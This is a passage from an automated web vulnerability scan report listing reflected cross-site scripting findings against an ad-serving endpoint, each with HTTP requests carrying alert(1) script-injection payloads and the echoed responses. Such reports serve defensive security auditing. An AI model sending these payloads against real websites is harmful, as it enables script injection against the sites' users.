This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&25ed5"><script>alert(1)</script>6b38c822330=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 11120
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 29 Nov 2010 17:01:14 GMT

<html><head><title>refurb_free_300x250_111710</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
0-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&25ed5"><script>alert(1)</script>6b38c822330=1\')(new Image).src=\'http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwF
...[SNIP]...

1.100. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /COM/iview/245726341/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7c725'-alert(1)-'d3fe4c42496 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&7c725'-alert(1)-'d3fe4c42496=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10451
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 29 Nov 2010 17:01:16 GMT

<html><head><title>CyberMon_SmartUpdate_300x250_112910</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
0-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&7c725'-alert(1)-'d3fe4c42496=1');
}
else
{
_strContentCIN1291001267984 = '<a target="_blank" href="http://clk.atdmt.com/go/245726341/direct;wi.300;hi.250;ai.192990089;ct.1/01/" onclick="if(\'http%3A%2F%2Fads%2Ebluelithium%
...[SNIP]...

1.101. http://redcated/COM/iview/245726341/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /COM/iview/245726341/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a0ac6"-alert(1)-"5cf4364f963 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&a0ac6"-alert(1)-"5cf4364f963=1 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 11045
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 29 Nov 2010 17:01:16 GMT

<html><head><title>refurb_free_300x250_111710</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
0-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3D&a0ac6"-alert(1)-"5cf4364f963=1",
clickThruUrl: "http://clk.redcated/go/245726341/direct;wi.300;hi.250;ai.191305088;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique
...[SNIP]...

1.102. http://redcated/COM/iview/245726341/direct [wi.300;hi.250/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /COM/iview/245726341/direct

Issue detail

The value of the wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f4478'-alert(1)-'ea244a6685e was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3Df4478'-alert(1)-'ea244a6685e HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 10435
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 29 Nov 2010 17:01:14 GMT

<html><head><title>CyberMon_SmartUpdate_300x250_112910</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0
...[SNIP]...
00-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3Df4478'-alert(1)-'ea244a6685e');
}
else
{
_strContentCIN1291001267984 = '<a target="_blank" href="http://clk.atdmt.com/go/245726341/direct;wi.300;hi.250;ai.192990089;ct.1/01/" onclick="if(\'http%3A%2F%2Fads%2Ebluelithium%2E
...[SNIP]...

1.103. http://redcated/COM/iview/245726341/direct [wi.300;hi.250/01?click parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /COM/iview/245726341/direct

Issue detail

The value of the wi.300;hi.250/01?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cf7d3</script><script>alert(1)</script>1b44593dcf8 was submitted in the wi.300;hi.250/01?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /COM/iview/245726341/direct;wi.300;hi.250/01?click=http%3A%2F%2Fads%2Ebluelithium%2Ecom%2Fclk%3F2%2C13%253Bdaa4c45afb25564b%253B12c98774d75%2C0%253B%253B%253B3196617298%2CA%2EtBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAdU13mCwBAAAAAAAAAGM2OTlhMGVjLWZiZDUtMTFkZi1iNTFhLTAwMWU2ODU3M2MyMQAzmSoAAAA%3D%2C%2Chttp%253A%252F%252Fguide%2Eopendns%2Ecom%252Fmain%253Furl%253Dadvancedmags%2Ecom%2526servfail%253D%2C$http%3A%2F%2Ft.invitemedia.com%2Ftrack_click%3FauctionID%3D1291048144844600-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3Dcf7d3</script><script>alert(1)</script>1b44593dcf8 HTTP/1.1
Host: redcated
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?A.tBADjjDACfhFYAAAAAAAWmFwAAAAAAAAAAAAIAAAAAAA8AAgACCzwFIQAAAAAAkDkfAAAAAAAUih8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACLpAYAAAAAAAIAAwAAAAAAzczMzMzMAEAAAAAAAAASQM3MzMzMzBBAAAAAAAAAIkDNzMzMzMwQQAAAAAAAACJAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALlxy1Trk8CdDAFodg4BP8XP87rdfGPR.0R2cgAAAAAA==,,http%3A%2F%2Fguide.opendns.com%2Fmain%3Furl%3Dadvancedmags.com%26servfail%3D,Z%3D300x250%26s%3D844600%26_salt%3D3318663486%26B%3D10%26u%3Dhttp%253A%252F%252Fguide.opendns.com%252Fmain%253Furl%253Dadvancedmags.com%2526servfail%253D%26r%3D1,c699a0ec-fbd5-11df-b51a-001e68573c21
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=484C17C84DEE440386469B4B8F7D0E08; AA002=1286756359-11647780; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 11138
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 29 Nov 2010 17:01:13 GMT

<html><head><title>refurb_free_300x250_111710</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
00-39616%26campID%3D18450%26crID%3D39616%26pubICode%3D2046352%26pub%3D271361%26partnerID%3D64%26url%3Dhttp%3A%2F%2Fguide%2Eopendns%2Ecom%2Fmain%3Furl%3Dadvancedmags%2Ecom%26servfail%3D%26redirectURL%3Dcf7d3</script><script>alert(1)</script>1b44593dcf8",
clickThruUrl: "http://clk.redcated/go/245726341/direct;wi.300;hi.250;ai.191305088;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_i
...[SNIP]...

1.104. http://redcated/COM/iview/245726341/http:/ads.bluelithium.com/clk [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /COM/iview/245726341/http:/ads.bluelithium.com/clk

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f36ee'%3bc912024fbc2 was submitted in the REST URL parameter 4. This input was echoed as f36ee';c912024fbc2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /COM/iview/245726341/http:f36ee'%3bc912024fbc2/ads.bluelithium.com/clk HTTP/1.1
Host: redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: AA002=1286756359-11647780; ach01=afa5f79/1c5b3/f8171be/e29b/4cd4c6f9:9bbdd1c/1b1dd/dab7f42/22ba7/4cd63e2f:b0136d4/1c5b3/f8171d7/e29b/4cd63e89:a2fcd2a/597b/e707601/bab9/4cd64919:b321860/2333a/10166747/64b4/4cd722cf:b41888b/24dc8/101bc427/64b4/4cd7230e:b35558f/2333a/fb79481/d4ad/4cd7417c:b3c2ffb/2612a/fde9cc3/e848/4cd741de:b264760/1588/ffa42ce/15028/4cd742c8:b163c6b/33f2/fc007b8/ce69/4cd8b365:b03dda3/26c90/f2b168e/ad0c/4cdedac9:b010d10/de5/fb0ce1a/f08b/4ce29f7d:b5bd5d2/19c18/109efe4f/bab9/4ce989e6:b50e070/1a43a/b8d1492/9cc2/4ceb0bb8:b73afdb/2506e/1065856f/64eb/4ceb26f5:b09bfb0/4a29/fbe4441/fb49/4cf1b708; ach00=22ba7/1b1dd:e29b/1c5b3:bab9/597b:64b4/2333a:64b4/24dc8:d4ad/2333a:e848/2612a:15028/1588:ce69/33f2:ad0c/26c90:f08b/de5:bab9/19c18:9cc2/1a43a:64eb/2506e:fb49/4a29; MUID=484C17C84DEE440386469B4B8F7D0E08;

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 7207
Content-Type: text/html
Expires: 0
Connection: close
Date: Mon, 29 Nov 2010 17:16:22 GMT
Connection: close

<html><head><title>refurb_free_300x250_111710</title>
